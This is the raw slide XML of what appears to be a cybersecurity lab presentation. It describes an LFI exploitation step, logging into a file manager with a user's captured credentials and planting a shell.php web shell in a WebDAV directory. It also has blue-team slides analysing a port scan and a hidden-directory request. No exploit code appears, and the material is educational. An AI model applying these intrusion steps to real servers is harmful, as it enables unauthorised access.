                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-AU" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>LFI (Local File Inclusion)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-AU" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Google Shape;1111;p62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D462506-B2E0-47D5-A659-8B211931A25D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12700" y="4916488"/>
            <a:ext cx="7972425" cy="227012"/>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US" sz="1000" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Presented by: Richard Brantsch</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Google Shape;1135;p63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C4313AC-1892-4008-9E06-02E153A58349}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Google Shape;1136;p63">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B8F5135-A109-4C0E-B5C5-C4941A668BE0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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3" name="Google Shape;1137;p63">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4FEC7D3-1CA0-4B50-84CC-2F4A1CDEDB20}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDE53DBD-819B-4183-ACF0-9FE44E04D5A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5604782" y="677836"/>
            <a:ext cx="3100379" cy="267381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr"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100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Planting the shell.php file into the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> directory</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D3A1064-EAF5-41F5-9445-ECAE34B09DBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1126714" y="887903"/>
            <a:ext cx="3783656" cy="267381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr"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chemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Using the Network-File Manager Login with Ryan`s credentials </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDCDF116-8694-400A-BCA0-30AB15F016C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1126714" y="1242406"/>
            <a:ext cx="3903903" cy="2379302"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A750D058-3003-4E34-90F7-B4CF958F0897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5433866" y="957020"/>
            <a:ext cx="3442213" cy="2239833"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{396E1C63-AF3F-421C-B241-33D6F94F66A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5867024" y="3544461"/>
            <a:ext cx="2300865" cy="1161960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F4E75B-E5DB-4EDA-8F8C-39C9D10351F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5604782" y="4572730"/>
            <a:ext cx="2818175" cy="267381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr"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100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>File successfully uploaded into the web server</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle: Rounded Corners 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4ECAC52C-16F7-4222-AFCF-A86559C92AF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1877927" y="1509787"/>
            <a:ext cx="1088638" cy="116589"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cmpd="dbl">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Rounded Corners 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B1F3EEC-46DD-428D-80E0-AEB1F552F58B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6873363" y="1652834"/>
            <a:ext cx="407144" cy="512885"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cmpd="dbl">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Rounded Corners 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE4DF9BC-8E15-4D23-B0B5-FF9F05BA45D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5867023" y="4308565"/>
            <a:ext cx="527761" cy="137456"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cmpd="dbl">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Google Shape;1066;p58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BB56E00-CD86-4988-A3BE-B22F1E50A6E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2401492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3" name="Google Shape;1153;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latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Blue Team</a:t>
            </a:r>
            <a:endParaRPr sz="4000" b="1" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Log Analysis and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2800" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2800" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Attack Characterization</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRP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latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Analysis: Identifying the Port Scan</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1163" name="Google Shape;1163;p65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12300" y="579987"/>
            <a:ext cx="91686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400" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The Port Scaning occured on the 16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" baseline="30000" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> October 2021 at 01:11:00 UTC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In Total 113,179 Packets were send and the source IP was 192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Based on the surge of HTTP traffic to multiple ports I was able to determine a port scan was occurring. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Google Shape;1066;p58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91A09816-396E-4017-B336-EAB8E97922C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Graphic 8" descr="Chevron arrows">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50EF20F6-E3CD-4E94-B034-0F14A04289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699" y="777914"/>
            <a:ext cx="388447" cy="388447"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Google Shape;1111;p62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CD677D2-F4B9-444E-99F8-78A893B8B733}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12700" y="4916488"/>
            <a:ext cx="7972425" cy="227012"/>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US" sz="1000" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Presented by: Richard Brantsch</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB0EB7D0-A5EE-4C29-9FBA-9460947A817F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="142699" y="2056021"/>
            <a:ext cx="4560206" cy="1338146"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C1EC0BE-D429-46C9-A2EA-AE6E4B33A68D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4833304" y="1720438"/>
            <a:ext cx="3974719" cy="22187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83EEF55E-1AC4-43FB-B692-1DB1F005B72B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4095535" y="3869628"/>
            <a:ext cx="5025763" cy="429687"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst>
          </a:pr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69" name="Google Shape;116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latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Analysis: Finding the Request for the Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1173" name="Google Shape;1173;p66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3196964" y="798964"/>
            <a:ext cx="6160168" cy="781596"/>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latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In total 15,823 requests were made on the 16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" baseline="30000" dirty="0">
                <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> October 2021 at 01:11:10 UTC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="320040" indent="-167640">
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The file requested in that directory is called “connect_to_corp_server” and contained a Hash password for the user “Ryan”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Graphic 4" descr="Chevron arrows">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7BED861-00C3-4FF6-82B5-EF6D9457BC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699" y="777914"/>
            <a:ext cx="388447" cy="388447"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFD86E4C-80CA-4171-B06A-DAF10F0F764E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4245818" y="3919947"/>
